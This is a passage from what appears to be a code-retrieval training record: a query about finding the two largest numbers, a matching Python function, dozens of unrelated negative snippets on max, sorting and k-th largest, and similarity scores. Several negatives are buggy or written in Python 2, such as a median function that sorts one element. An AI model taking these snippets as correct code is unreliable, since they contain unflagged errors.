largestNumber(self, nums): \n def string_comp(item1, item2):\n return 1 if str(item1) + str(item2) < str(item2) + str(item1) else -1\n res_list = sorted(nums, key=cmp_to_key(string_comp))\n\n # Catch edge case where list of 0s will produce \"000..\" instead of a single \"0\"\n if set(res_list) == {0}:\n return \"0\"\n return \"\".join([str(i) for i in res_list])", "def buble_sort(l):\r\n for i in range(len(l)):\r\n for j in range(i+1, len(l)):\r\n if (l[j-1]>l[j]):\r\n l[j-1], l[j] = l[j], l[j-1]", "def max(l):\n if l:\n s_list = sorted(l)\n return s_list[-1]\n else:\n raise ValueError(\"list empty\")", "def max_profit(l: list) -> int:\n smallest = float(\"inf\")\n largest_profit = 0\n for x in l:\n smallest = min(smallest, x)\n largest_profit = max(x - smallest, largest_profit)\n\n return largest_profit", "def my_max(*args):\n def sorter(sequence):\n \"\"\"\n This function find max in given sequence of simple numbers\n \"\"\"\n def bubble_sort(a):\n \"\"\"\n This function sort the list\n \"\"\"\n for i in reversed(range(len(a))):\n for j in range(1, i + 1):\n if a[j-1] > a[j]:\n a[j], a[j-1] = a[j-1], a[j]\n return a\n\n listed_seq = list(sequence)\n for number in listed_seq:\n if not isinstance(number, int):\n raise ValueError(\"Can't find max, wrong data format\")\n return bubble_sort(listed_seq)[-1]\n\n if not args:\n raise ValueError(\"Can't find max, no data given\")\n if len(args) == 1:\n thing = args[0]\n if isinstance(thing, (list, tuple)):\n return sorter(thing)\n if isinstance(thing, 
int):\n return thing\n raise ValueError(\"Can't find max, wrong data format\")\n return sorter(args)", "def second_largest(values: List[int]) -> int:\n try:\n return sorted(set(values))[-2]\n except IndexError:\n raise ValueError(\"second_largest() needs at least two distinct values\")", "def findKthLargest(self, nums: List[int], k: int) -> int:\n return sorted(nums)[-k]", "def get_longest_all_primes(lst: list[int]):\n subsecventa_max1 = []\n for i in range(len(lst)):\n for j in range(len(lst)):\n if toate_elementele_prime(lst[i:j + 1]) and len(lst[i:j + 1]) > len(subsecventa_max1):\n subsecventa_max1 = lst[i:j + 1]\n return subsecventa_max1", "def get_majority_element_sort_count(self, lst, left, right):\r\n # get sorted list\r\n sorted_lst = sorted(lst)\r\n \r\n n = len(sorted_lst)\r\n \r\n for i in range(n):\r\n count = sorted_lst.count(sorted_lst[i])\r\n if count > int(math.floor(n / 2.0)): return sorted_lst[i]\r\n \r\n return -1", "def sort(lst):\n n = len(lst)\n done = False\n round = n - 1\n while not done and round:\n done = True\n for i in range(round):\n if lst[i] > lst[i+1]:\n lst[i], lst[i+1] = lst[i+1], lst[i]\n done = False\n round -= 1", "def max_pairwise_product(numbers):\n n = len(numbers)\n max_product = 0\n for first in range(n):\n for second in range(first + 1, n):\n max_product = max(max_product,\n numbers[first] * numbers[second])\n\n return max_product", "def _get_k_largest(lst, k):\n sorted_lst = sorted([(val, index) for index, val in enumerate(lst)])\n return list(reversed(sorted_lst[-k:]))", "def maxProduct(data):\n maxval = float('-inf')\n for i in range(len(data)):\n for j in range(i+1, len(data)):\n if maxval < data[i]*data[j]:\n maxval = data[i]*data[j]\n a,b = (data[i],data[j])\n return tuple([a,b])", "def max(self, num_list):\n try:\n max = int(num_list[0])\n\n for number in num_list:\n try:\n if number > max:\n max = number\n except Exception as e:\n print(\"Error\", e)\n\n except Exception as e:\n print(\"Error:\", e)\n\n return max", "def test_computes_max_nth_digit_by_multiples_of_two(self):\t\t\n\t\tself.assertEqual(64, products_of_multiplied_nth_digits(20, 2))", "def max(input: list[int]) -> int:\n i = 0\n if len(input) == 0:\n raise ValueError(\"max() arg is an empty List\")\n\n else:\n while i < len(input):\n j = i + 1\n while j < len(input):\n if input[i] > input[j]:\n if j == len(input) - 1:\n if input[i] >= input[len(input) - 1]:\n return input[i]\n j += 1\n else:\n j += len(input)\n i += 1\n return input[len(input) - 1]", "def bubble_sort(first):\n # iterate len(lst) times\n for i in range(len(first)):\n\n # integrate [len(lst) - i - 1] times\n for j in range(len(first) - i - 1):\n\n # sort two number if not sorted\n if first[j] > first[j + 1]:\n # swap element at j with element at j + 1\n # and element ad j + 1 with element j\n first[j], first[j + 1] = first[j + 1], first[j]", "def merge_sort(cls, num_list):\n if len(num_list) > 1:\n first_half = num_list[:len(num_list) // 2]\n second_half = num_list[len(num_list) // 2:]\n cls.merge_sort(first_half)\n cls.merge_sort(second_half)\n first_index = 0\n second_index = 0\n list_index = 0\n\n while first_index < len(first_half) and \\\n second_index < len(second_half):\n if first_half[first_index] > second_half[second_index]:\n num_list[list_index] = second_half[second_index]\n second_index += 1\n else:\n num_list[list_index] = first_half[first_index]\n first_index += 1\n list_index += 1\n\n for i in range(first_index, len(first_half)):\n num_list[list_index] = first_half[first_index]\n list_index += 
1\n first_index += 1\n\n for x in range(second_index, len(second_half)):\n num_list[list_index] = second_half[second_index]\n list_index += 1\n second_index += 1", "def max_heapify(lst, n, root):\n\n largest = root\n l = 2 * root + 1\n r = 2 * root + 2\n\n if l < n and lst[l] > lst[largest]:\n largest = l\n if r < n and lst[r] > lst[largest]:\n largest = r\n if largest != root:\n lst[root], lst[largest] = lst[largest], lst[root]\n max_heapify(lst, n, largest)", "def find_largest_diff(list_of_nums):\n largest_diff = 0\n for i in range(len(list_of_nums) - 1):\n diff = abs(list_of_nums[i] - list_of_nums[i+1])\n if diff > largest_diff:\n largest_diff = diff\n\n return largest_diff", "def msort(mylist):\n comparision_count = 0\n if len(mylist)>1:\n # Dividing the list\n mid_point = len(mylist)//2\n leftlist = msort(mylist[: mid_point])\n rightlist = msort(mylist[mid_point:])\n\n # Merging the results\n merged_results = merge(leftlist[0],rightlist[0])\n comparision_count = comparision_count + merged_results[1]\n return (merged_results[0], comparision_count )\n else:\n return (mylist,comparision_count)", "def calculate(numbers):\n old_lst = numbers[::]\n selection_sort(numbers)\n if len(numbers) % 2 == 1:\n median = numbers[len(numbers) // 2]\n else:\n median = (numbers[len(numbers) // 2] + numbers[(len(numbers) // 2) - 1]) / 2\n average = sum(numbers) / len(numbers)\n\n return old_lst, len(numbers), sum(numbers), min(numbers), max(numbers), \\\n average, median", "def test_swap_k_max(self):\r\n self.num2 = [1, 2, 3, 4, 5, 6]\r\n a1.swap_k(self.num2, len(self.num2)//2)\r\n self.assertEqual(self.num2, [4, 5, 6, 1, 2, 3])", "def tred(t):\n\n t2 = t\n\n l = []\n l2 = t2.pop()\n l1 = t2.pop()\n\n for i in range(len(l1)):\n l.append(l1[i] + max(l2[i:i+2]))\n\n t2.append(l)\n return t2", "def nmax(num, T, nwords):\n values = []\n top_n = T.argsort()[-num:][::-1]\n for n in top_n:\n nwords.append(((data['all_words'][n])))\n values.append(round(T[n],3))\n return nwords", "def get_big_joker_value(deck: List[int]) -> int:\n return max(deck)", "def v6_multimax(iterable):\n maximums = []\n for item in iterable:\n if not maximums or maximums[0] == item:\n maximums.append(item)\n elif item > maximums[0]:\n maximums = [item]\n return maximums", "def mysort(lst: List[T], compare: Callable[[T, T], int]) -> List[T]:\n temp = lst\n switched = True\n while switched:\n switched = False\n for i in range(len(temp) - 1):\n if compare(temp[i], temp[i + 1]) == 1:\n temp[i], temp[i + 1] = temp[i + 1], temp[i]\n switched = True\n\n return temp", "def main():\n\n s = set()\n\n while True:\n n = input('Enter a number: ')\n if n == -99:\n break\n\n s.add(n)\n\n l = list(s)\n\n if len(l) < 2:\n print 'sorry but the list is too small'\n exit(1)\n\n l.sort()\n print 'The second largest number is', l[-2]", "def largest_product(digits, size):\n # Why does a blank set of digits have a maximum product of 1?\n slice_list = slices(digits, size)\n def mult_reduce(items):\n total = 1\n for i in items:\n total *= i\n return total\n slice_list = [mult_reduce(l) for l in slice_list]\n return max(slice_list)", "def lab10_q3():\n return \"\"\"\n Use list comprehension max(lst_of_qvm, key=lambda qvm : total_revenue(qvm))\n\tThis makes each element of the list go through the key which gives total_revenue for each one. 
Then just get the max in that list\n \"\"\"", "def method2(self, nums):\n N = len(nums)\n inc = 1\n dec = 1\n \n for i in range(1, N):\n if nums[i] > nums[i - 1]:\n dec = inc + 1\n elif nums[i] < nums[i - 1]:\n inc = dec + 1\n \n return max(inc, dec)", "def nth_largest(a_list, n):\n if n < 1:\n return\n n -= 1 # 0 indexing\n\n pivot = a_list[-1]\n\n bigger = -1\n print a_list\n for i in range(len(a_list)-1):\n if a_list[i] > pivot:\n a_list[bigger+1], a_list[i] = a_list[i], a_list[bigger+1]\n bigger += 1\n # swap pivot with bigger+1 element\n a_list[bigger+1], a_list[-1] = a_list[-1], a_list[bigger+1]\n print a_list\n print bigger\n print n\n\n if n == bigger+1:\n return a_list[n]\n elif n < bigger+1: # element in left sub array\n return nth_largest(a_list[:bigger+1], n+1)\n elif n > bigger+1: # element in right sub array\n return nth_largest(a_list[bigger+2:], n+1-len(a_list[:bigger+2]))", "def highestMax(requestContext, seriesList, n):\n result_list = sorted( seriesList, key=lambda s: max(s) )[-n:]\n\n return sorted(result_list, key=lambda s: max(s), reverse=True)", "def fn(lo, hi):\n if lo == hi: return piles[lo]\n return max(piles[lo] - fn(lo+1, hi), piles[hi] - fn(lo, hi-1))", "def sort(self): # sort all entries to make room for new ones, determine best and worst\n ns = self.num_stored.value\n ys = np.asarray(self.ys[:ns])\n yi = ys.argsort()\n sortRuns = []\n for i in range(len(yi)):\n y = ys[yi[i]]\n xs = self.get_x(yi[i])\n sortRuns.append((y, xs))\n numStored = min(len(sortRuns),int(0.9*self.capacity)) # keep 90% best \n for i in range(numStored):\n self.replace(i, sortRuns[i][0], sortRuns[i][1])\n self.num_sorted.value = numStored \n self.num_stored.value = numStored \n return numStored", "def get_top_n_motif_scores(score_list,top_n):\r\n\treturn score_list.argsort()[-top_n:],score_list[score_list.argsort()[-top_n:]]", "def mysort(lst: List[T], compare: Callable[[T, T], int]) -> List[T]:\n for i in range(1, len(lst)): #loops through each element starting at the second one\n for j in range(i, 0, -1): #loops through each element coming before i starting at i and going backwards\n if compare(lst[j], lst[j-1]) < 0: #checks to see if the previous element is smaller than the current (by saying <0 we keep the sort stable as well)\n lst[j], lst[j-1] = lst[j-1], lst[j] #if they are, we switch them\n else:\n break #if they are not, we know that the element is in its proper place\n return lst", "def robSingle_2(self, nums, start, end):\n # print((start, end))\n # print(nums[start: end + 1])\n curMax = 0\n preMax = 0\n for num in nums[start:end + 1]:\n preMax, curMax = curMax, max(curMax, preMax + num)\n # print(curMax)\n # print(\"####################################\")\n return curMax", "def wiggle_sort(nums):\n\n for i in range(len(nums)):\n if (i % 2 == 1) == (nums[i - 1] > nums[i]):\n nums[i - 1], nums[i] = nums[i], nums[i - 1]", "def calc_median(numbers):\n middle_index = len(numbers) // 2\n return sorted(numbers[middle_index]) # sorted returns the numbers sorted without changing" ]
[ "0.6987764", "0.685001", "0.66746044", "0.66537255", "0.6615918", "0.66083395", "0.6553763", "0.64379936", "0.64302796", "0.6412502", "0.6391118", "0.63837785", "0.6367723", "0.6360329", "0.633378", "0.6331884", "0.63131255", "0.6293756", "0.628999", "0.6283172", "0.6250778", "0.622592", "0.6221877", "0.61929554", "0.617386", "0.6142375", "0.6129786", "0.6127789", "0.6103437", "0.6090518", "0.6084688", "0.60507387", "0.6048664", "0.6022701", "0.5995499", "0.59847677", "0.5979381", "0.5933823", "0.59312403", "0.5930939", "0.5930768", "0.59303266", "0.5928497", "0.5917425", "0.5898493", "0.5861299", "0.5854563", "0.5845493", "0.58239347", "0.58131784", "0.58048135", "0.57988006", "0.5795246", "0.5788245", "0.5784666", "0.5778629", "0.57668626", "0.5746271", "0.57438767", "0.5739903", "0.57369626", "0.5718114", "0.5711964", "0.5709532", "0.5704639", "0.57035416", "0.57016057", "0.5685936", "0.56821376", "0.5675288", "0.5658732", "0.56565", "0.565557", "0.56548667", "0.56520444", "0.56345356", "0.56224394", "0.5617801", "0.561509", "0.56090987", "0.5599736", "0.5598663", "0.55984807", "0.559203", "0.5591292", "0.5588946", "0.55803746", "0.55731016", "0.55640143", "0.55615807", "0.55564857", "0.55532223", "0.55405104", "0.55280244", "0.55238616", "0.5521784", "0.55211353", "0.5520827", "0.5518126", "0.55111474" ]
0.7739796
0
Find the largest 2 numbers by scanning through the list
def max_pairwise_product_fast(numbers):
    num_list = numbers.copy()
    max_num_1 = max(num_list)
    num_list.remove(max_num_1)
    max_num_2 = max(num_list)
    ans = max_num_1*max_num_2
    return ans
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def max_in_list(list):\n x=list[0] #set x be the first number in the list\n for i in range(0,len(list)):#go over the number in the list\n if x<=list[i]: #if the second one is bigger than the first\n x=list[i] #assign x to the bigger one\n else:\n continue#repeat until find the max number\n return x", "def find_greatest_number(incoming_list):\n #magiclownumber= none\n #retval= magiclownumber\n #for value in incoming_list:\n #if not retval:\n #retval = value\n # if value> retvale\n #retval= value\n #return retval\n greatest_number = max(incoming_list)\n return greatest_number", "def two_largest(inlist):\n largest = second_largest = 0\n it1 = it2 = 0\n\n for i,item in enumerate(inlist):\n if item > largest:\n largest = item\n it1 = i\n elif largest > item > second_largest:\n second_largest = item\n it2 = i\n # Return the results as a tuple\n return largest, it1, second_largest, it2", "def find_greatest_number(incoming_list):\n retval = max(incoming_list)\n return retval", "def find_greatest_number(incoming_list: list):\n return max(incoming_list)", "def second_largest(number_list):\n for i in range(len(number_list)):\n for j in range(len(number_list) - 1 - i):\n if number_list[j] > number_list[j+1]:\n number_list[j + 1], number_list[j] = number_list[j], number_list[j+1]\n\n return number_list[-2]", "def greatest_difference(num_list):", "def largest_number_at_least_twice_of_others2(nums: [int]) -> int:\n if len(nums) == 1:\n return 0\n\n max_index = nums.index(max(nums))\n max_val = nums.pop(max_index)\n next_max = max(nums)\n\n if next_max * 2 <= max_val:\n return max_index\n return -1", "def find_greatest_number(incoming_list):\n #return_value = max(incoming_list)\n #return return_value\n\n MAGIC_LOW_NUMBER = None\n retval = MAGIC_LOW_NUMBER\n\n # 1,2,3,4,5,1\n # MAGIC_LOW_NUMBER, 1 ->STORE 1\n #1 , 2 ->STORE 2\n #2, , 3 ->STORE 3\n #3, , 4 ->STORE 4 \n #4, , 5 ->STORE 5\n #5, , 1 ->??? 
nothing \n for value in incoming_list:\n if not retval:\n retval = value\n if value > retval:\n retval = value", "def findSecondLargest(self):\n l = []\n self.flatten(l)\n print(l)\n print(l[-2])", "def find_largest_number_in_list(self, list_with_numbers):\n return 0", "def second_largest(values: List[int]) -> int:\n try:\n return sorted(set(values))[-2]\n except IndexError:\n raise ValueError(\"second_largest() needs at least two distinct values\")", "def my_max(in_list):\n biggest = in_list[0]\n for l in in_list:\n if l > biggest:\n biggest = l\n return biggest", "def largest_two():\n # Add your code below!", "def get_max_loot(input_list):\n even = sum(input_list[::2])\n odd = sum(input_list[1::2])\n return even if even > odd else odd", "def largest_item(list):\n pass", "def max_num(num_list):\n\n return max(num_list)", "def find_largest_element(num_1, num_2, num_3):\n\n return max([num_1, num_2, num_3])", "def list_max(numbers):\n maxnum = 0\n \n for num in numbers[0:]:\n if num > maxnum:\n maxnum = num\n return maxnum", "def largest(n,xs):\n return sorted(xs, reverse = True)[:n][::-1]", "def nth_largest2(a_list, n):\n a_list.sort()\n new_list = a_list[::-1]\n return new_list[n-1]", "def max(self, num_list):\n try:\n max = int(num_list[0])\n\n for number in num_list:\n try:\n if number > max:\n max = number\n except Exception as e:\n print(\"Error\", e)\n\n except Exception as e:\n print(\"Error:\", e)\n\n return max", "def max_pairwise_product_sort(numbers):\n sorted_list = sorted(numbers)\n ans = sorted_list[-1]*sorted_list[-2]\n return ans", "def find_max(ls):\n\n if len(ls) == 1:\n return ls[0]\n elif len(ls) == 2:\n return ls[0] if ls[0] > ls[1] else ls[1]\n else:\n mid = len(ls) // 2\n m1 = find_max(ls[0:mid])\n m2 = find_max(ls[mid:])\n return m1 if m1 > m2 else m2", "def highest_product_2(arr):\n\n # make a list to store the highest three ints, initializing to first three\n maxes = [arr[0], arr[1], arr[2]]\n\n # find the lowest of the highest three ints\n lowest_max = min(maxes)\n\n # go through the rest of the list to check for higher values\n for num in arr[3:]:\n # if any value is higher than the lowest max, update maxes list\n if num > lowest_max:\n # remove the old maximum\n maxes.remove(lowest_max)\n # add the new one\n maxes.append(num)\n # recalculate the lowest max for continued comparison\n lowest_max = min(maxes)\n\n return maxes[0] * maxes[1] * maxes[2]", "def largest_number_at_least_twice_of_others(nums: [int]) -> int:\n largest = None\n next_largest = None\n\n for idx, num in enumerate(nums):\n if largest is None:\n largest = idx\n continue\n if num > nums[largest]:\n next_largest = largest\n largest = idx\n continue\n if next_largest is None or num > nums[next_largest]:\n next_largest = idx\n\n if next_largest is None or (nums[next_largest] * 2) <= nums[largest]:\n return largest\n return -1", "def nextMax(value,lista):\n for i in lista:\n if i>value:\n return i\n raise NameError('No value')", "def question_24(list_num: int) -> int:\n return max(list_num, key=list_num.count)", "def main():\n\n s = set()\n\n while True:\n n = input('Enter a number: ')\n if n == -99:\n break\n\n s.add(n)\n\n l = list(s)\n\n if len(l) < 2:\n print 'sorry but the list is too small'\n exit(1)\n\n l.sort()\n print 'The second largest number is', l[-2]", "def maxNumber(x):\n maxVal = x[0]\n for num in x:\n if maxVal <num:\n maxVal=num\n return maxVal", "def largest_int(numbers):\n\n if numbers == []:\n return \n max_int = numbers[0]\n for number in numbers:\n if number > max_int:\n 
max_int = number\n \n return max_int", "def max(input: list[int]) -> int:\n i = 0\n if len(input) == 0:\n raise ValueError(\"max() arg is an empty List\")\n\n else:\n while i < len(input):\n j = i + 1\n while j < len(input):\n if input[i] > input[j]:\n if j == len(input) - 1:\n if input[i] >= input[len(input) - 1]:\n return input[i]\n j += 1\n else:\n j += len(input)\n i += 1\n return input[len(input) - 1]", "def max_num_in_list(a_list):\n max_number = max(a_list)\n return max_number", "def max_(lst: Iterable[int]) -> int:\n return reduce(lambda x, y: x if x > y else y, lst)", "def max(input: list[int]) -> int:\n if len(input) == 0:\n raise ValueError(\"max() arg is an empty List\")\n else:\n input.sort()\n return input[-1]", "def method2(self, nums):\n N = len(nums)\n inc = 1\n dec = 1\n \n for i in range(1, N):\n if nums[i] > nums[i - 1]:\n dec = inc + 1\n elif nums[i] < nums[i - 1]:\n inc = dec + 1\n \n return max(inc, dec)", "def main(num, li1, list2):\n li1 = [[float(input()), float(input())] for i in range(num)]\n list2 = [li1[i][1]/li1[i][0] for i in range(num)]\n li1.sort(key=lambda x: x[0])\n for i in range(num):\n if li1[i][1]/li1[i][0] == max(list2):\n return print(\"%.2f %.2f\"%(li1[i][0], li1[i][1]))", "def largestNumber(self, nums): \n def string_comp(item1, item2):\n return 1 if str(item1) + str(item2) < str(item2) + str(item1) else -1\n res_list = sorted(nums, key=cmp_to_key(string_comp))\n\n # Catch edge case where list of 0s will produce \"000..\" instead of a single \"0\"\n if set(res_list) == {0}:\n return \"0\"\n return \"\".join([str(i) for i in res_list])", "def max(input: list[int]) -> int:\n if len(input) == 0:\n raise ValueError(\"max() arg is an empty List\")\n most: int = input[0]\n n: int = 1\n while n < len(input):\n if input[n] > most:\n most = input[n]\n n += 1 \n return most", "def robSingle_2(self, nums, start, end):\n # print((start, end))\n # print(nums[start: end + 1])\n curMax = 0\n preMax = 0\n for num in nums[start:end + 1]:\n preMax, curMax = curMax, max(curMax, preMax + num)\n # print(curMax)\n # print(\"####################################\")\n return curMax", "def my_max(*args):\n def sorter(sequence):\n \"\"\"\n This function find max in given sequence of simple numbers\n \"\"\"\n def bubble_sort(a):\n \"\"\"\n This function sort the list\n \"\"\"\n for i in reversed(range(len(a))):\n for j in range(1, i + 1):\n if a[j-1] > a[j]:\n a[j], a[j-1] = a[j-1], a[j]\n return a\n\n listed_seq = list(sequence)\n for number in listed_seq:\n if not isinstance(number, int):\n raise ValueError(\"Can't find max, wrong data format\")\n return bubble_sort(listed_seq)[-1]\n\n if not args:\n raise ValueError(\"Can't find max, no data given\")\n if len(args) == 1:\n thing = args[0]\n if isinstance(thing, (list, tuple)):\n return sorter(thing)\n if isinstance(thing, int):\n return thing\n raise ValueError(\"Can't find max, wrong data format\")\n return sorter(args)", "def find_max(list):\n return find_value_at(list, 0)", "def largest_ten(list1):\n result = []\n for i in range(10):\n max1 = list1[0]\n for j in list1:\n if max1 < j:\n max1 = j\n result.append(max1) ##the final target is the max1 when finishing this loop\n list1.remove(max1)\n\n return result", "def largest(*args):\r\n if len(args) == 2:\r\n a, b = args\r\n return switch(a > b, a, b)\r\n else:\r\n return max(stack(*args), axis=0)", "def find_largest_diff(list_of_nums):\n largest_diff = 0\n for i in range(len(list_of_nums) - 1):\n diff = abs(list_of_nums[i] - list_of_nums[i+1])\n if diff > 
largest_diff:\n largest_diff = diff\n\n return largest_diff", "def get_longest_all_primes(lst: list[int]):\n subsecventa_max1 = []\n for i in range(len(lst)):\n for j in range(len(lst)):\n if toate_elementele_prime(lst[i:j + 1]) and len(lst[i:j + 1]) > len(subsecventa_max1):\n subsecventa_max1 = lst[i:j + 1]\n return subsecventa_max1", "def max(l):\n if l:\n s_list = sorted(l)\n return s_list[-1]\n else:\n raise ValueError(\"list empty\")", "def max_val(t):\n # Your code here\n\n def openItem(term):\n newList = []\n\n for item in term:\n if type(item) == int:\n newList.append(item)\n\n else:\n newList += openItem(item)\n\n return newList\n\n sortingList = openItem(t)\n\n maximum = sortingList[0]\n\n for item in sortingList:\n if maximum < item:\n maximum = item\n\n return maximum", "def test_find_second_largest(self):\n secondLargestValue = sorted(self.values)[-2]\n valueFound = self.tree.findSecondLargest(self.tree.root)\n self.assertEquals(secondLargestValue, valueFound)", "def maxi(a,b):\n\tif a > b: \n\t\treturn a\n\treturn b", "def getMax(array_list):\n m = array_list[0]\n m_index = 0\n for i,value in enumerate(array_list):\n if value > m:\n m = value\n m_index = i\n return (m_index,m)", "def give_greatest_spart(cls, spart_list):\n if len(spart_list) == 1:\n return spart_list[0]\n sorted_list = cls.sort_by_dominance(spart_list)\n if not(sorted_list[0] > sorted_list[1]):\n print(\"The two largest elements are non-comparable\")\n return []\n else:\n return sorted_list[0]", "def maximum(some_list):\n return max(some_list)", "def max_index_of_smaller_number(list, number):\n for i, element in enumerate(list):\n if element >= number:\n return i - 1", "def get_max(num_one, num_two):\n temp_a = int(str(num_one) + str(num_two))\n temp_b = int(str(num_two) + str(num_one))\n if temp_a >= temp_b:\n return num_one\n else:\n return num_two", "def maxn(a,b):\n\n if a>b:\n return a\n else:\n return b", "def find_max_numb(x,y):\n if x > y:\n print(x, \" - is max number.\")\n return x \n else:\n print(y, \" - is max number.\")\n return y", "def find_max(data):\n index = 0\n res = data[index]\n for i in range(1, len(data)):\n if data[i] > res:\n res = float(data[i])\n index = i\n else:\n break\n return res, index", "def robSingle(self, nums, start, end):\n # print((start, end))\n # print(nums[start: end])\n curMax = 0\n preMax = 0\n for num in nums[start:end]:\n preMax, curMax = curMax, max(curMax, preMax + num)\n # print(curMax)\n # print(\"####################################\")\n return curMax", "def max_info(lst):\n k = []\n maxm = -1\n for i in range(len(lst)):\n if lst[i] == maxm:\n k.append(i)\n if lst[i] > maxm:\n maxm = lst[i]\n k = [i]\n return k", "def return_max(lst, highest=None):\n if highest is None and len(lst) > 0:\n highest = lst[0]\n if len(lst) <= 1:\n return highest\n highest = max(highest, lst[0])\n return return_max(lst[1:], highest)", "def maxVal(item_list, rem_space):\n if item_list == [] or rem_space == 0: # no items or space\n result = (0, ())\n else:\n next_item = item_list[0]\n if next_item.getCost() > rem_space:\n result = maxVal(item_list[1:], rem_space)\n else:\n with_val, with_list = maxVal(item_list[1:],\n rem_space-next_item.getCost())\n with_val += next_item.getValue()\n\n without_val, without_list = maxVal(item_list[1:],\n rem_space)\n if with_val > without_val:\n result = (with_val, with_list + (next_item, ))\n else:\n result = (without_val, without_list)\n return result", "def max_list_iter(int_list): # must use iteration not recursion\n if int_list == None:\n 
raise ValueError(\"Must be list\")\n else:\n if len(int_list) < 1:\n return None\n max = int_list[0]\n for val in int_list:\n if val > max:\n max = val\n return max", "def find_max_val_unimodal_arr(unimodal_arr):\n arr = unimodal_arr\n maxfound = False\n if (len(arr) == 0):\n print('empty list')\n return -1\n\n center = math.floor(len(arr)/2)\n left = (math.floor(len(arr)/2)-1) if (math.floor(len(arr)/2)-1) >= 0 else 0\n right = (math.floor(len(arr)/2)+1) if (math.floor(len(arr)/2)+1) <= (len(arr)-1) else (len(arr)-1)\n\n if (len(arr) == 1):\n print('maximum value = ' + str(arr[center]))\n return arr[center]\n\n if (len(arr) == 2):\n print('maximum value = ' + str(arr[left] if arr[left] > arr[right] else arr[right]))\n return arr[left] if arr[left] > arr[right] else arr[right]\n\n while (not maxfound):\n if (arr[left] > arr[center]):\n arr = arr[:center]\n center = math.floor(len(arr)/2)\n left = (math.floor(len(arr)/2)-1) if (math.floor(len(arr)/2)-1) >= 0 else 0\n right = (math.floor(len(arr)/2)+1) if (math.floor(len(arr)/2)+1) <= (len(arr)-1) else (len(arr)-1)\n if (arr[right] > arr[center]):\n arr = arr[center:]\n center = math.floor(len(arr)/2)\n left = (math.floor(len(arr)/2)-1) if (math.floor(len(arr)/2)-1) >= 0 else 0\n right = (math.floor(len(arr)/2)+1) if (math.floor(len(arr)/2)+1) <= (len(arr)-1) else (len(arr)-1)\n if ((arr[right] <= arr[center]) and (arr[left] <= arr[center])):\n maxfound = True\n\n print('maximum value = ' + str(arr[center]))\n return arr[center]", "def most_popular_binary(lst_sorted):\n for l in range(1, 11):\n print(l, lst_sorted[-l])", "def get_sum_of_greatest_elements(my_list, x):\r\n result = []\r\n for i in range(0, x):\r\n max1 = 0\r\n for j in range(len(my_list)):\r\n if my_list[j] > max1:\r\n max1 = my_list[j]\r\n my_list.remove(max1)\r\n result.append(max1)\r\n\r\n count = 0\r\n for x in result:\r\n count += x\r\n return count", "def findKthLargest(self, nums: List[int], k: int) -> int:\n return sorted(nums)[-k]", "def max_list_iter(int_list): # must use iteration not recursion\n if int_list == None: # error handling\n raise ValueError\n elif len(int_list) == 0: # when the list is empty\n return None\n else:\n max_num = int_list[0]\n for num in int_list:\n if num > max_num:\n max_num = num\n return max_num", "def twoMaxs(lnp):\n\tindex1 = 0\n\tindex2 = 0\n\tcnt = 0\n\tmaxArea = 0\n\tmaxArea2 = 0\n\tfor (ex, ey, ew, eh) in lnp:\n\t\tif(ew * eh >= maxArea):\n\t\t\tindex1 = cnt\n\t\t\tmaxArea = ew * eh\n\t\tcnt += 1\n\t\n\n\tcnt = 0\n\tfor (ex, ey, ew, eh) in lnp:\n\t\tif(index1 == cnt):\n\t\t\tcnt += 1\n\t\t\tcontinue\n\t\tif(ew * eh >= maxArea2):\n\t\t\tindex2 = cnt\n\t\t\tmaxArea2 = ew * eh\n\t\tcnt +=1\n\t\n\treturn (index1, index2)", "def max_val_rec(alist):\n ln = len(alist)\n mid = ln//2\n if ln > 2:\n left = max_val_rec(alist[:mid])\n right = max_val_rec(alist[mid:])\n return left if left > right else right\n else:\n return max(alist)", "def finger(numbers):\n \n greater = 0 #storing largest number\n \n for i in numbers:\n if i%2 != 0 and i > greater: #check if odd and if larger than greater\n greater = i\n \n if greater == 0: # True if none are odd, greater var not changed\n return 'None of the numbers entered are odd.'\n \n return 'The largest odd number is: ' + str(greater)", "def maximumProduct2(self, nums: List[int]) -> int:\n big_1 = big_2 = big_3 = -float(\"inf\")\n small_1 = small_2 = float(\"inf\")\n for n in nums:\n if n >= big_1:\n big_1, big_2, big_3 = n, big_1, big_2\n elif n >= big_2:\n big_2, big_3 = n, big_2\n elif n >= big_3:\n 
big_3 = n\n \n if n <= small_1:\n small_1, small_2 = n, small_1\n elif n <= small_2:\n small_2 = n\n \n return max(big_1 * big_2 * big_3, big_1 * small_1 * small_2)", "def personal_best(scores: list) -> int:\n return max(scores)", "def get_longest_prime_digits(lst: list[int]) -> list[int]:\r\n lst1 = []\r\n count = 0\r\n maxi = 0\r\n x = 0\r\n for i in range(len(lst)):\r\n if lst[i] > 0:\r\n if get_longest_prime_digits_for_one(lst[i]):\r\n count += 1\r\n if count > maxi:\r\n maxi = count\r\n x = i + 1\r\n else:\r\n count = 0\r\n for i in range(x - maxi, x):\r\n lst1.append(int(lst[i]))\r\n return lst1", "def find_largest_adjacent_difference(nums):\n pass", "def max_profit(l: list) -> int:\n smallest = float(\"inf\")\n largest_profit = 0\n for x in l:\n smallest = min(smallest, x)\n largest_profit = max(x - smallest, largest_profit)\n\n return largest_profit", "def find_largest_smaller_than(nums, xnumber):\n\n # Win fast\n if nums[-1] < xnumber:\n return nums[-1]\n\n # Fail fast\n if nums[0] > xnumber:\n return None\n\n # Minimum and maximum indices\n min = 0\n max = len(nums) - 1\n\n while max - min > 0:\n\n # Bisect the list\n # We add one to bisect on the right side if list has an even length\n # For example a list of length 4 would get cut at index 2 instead of 1\n mid = ((max - min) + 1)/2 + min\n\n if nums[mid] > xnumber:\n max = mid - 1\n elif nums[mid] < xnumber:\n min = mid\n\n # Case when nums[mid] == xnumber\n else:\n return nums[mid-1]\n\n return nums[min]", "def max_list_iter(int_list): # must use iteration not recursion\n\n if int_list is None:\n raise ValueError\n\n if not int_list:\n return None\n\n if len(int_list) == 1:\n return int_list[0]\n\n max_so_far: object = int_list[0]\n for i in range(len(int_list)):\n if int_list[i] > max_so_far:\n max_so_far = int_list[i]\n\n return max_so_far", "def maximo(arr):\n maxVal = float('-inf')\n maxIdx = -1\n\n for i in range(len(arr)):\n if arr[i] > maxVal:\n maxVal = arr[i]\n maxIdx = i\n\n return maxVal, maxIdx", "def get_max_salary(n, numbers):\n temp_n = n\n result = \"\"\n while temp_n != 0:\n max_num = numbers[0]\n temp_index = 0\n for i in range(0, n):\n max_num = get_max(max_num, numbers[i])\n if(max_num == numbers[i]):\n temp_index = i\n result += str(max_num)\n numbers[temp_index] = 0\n temp_n -= 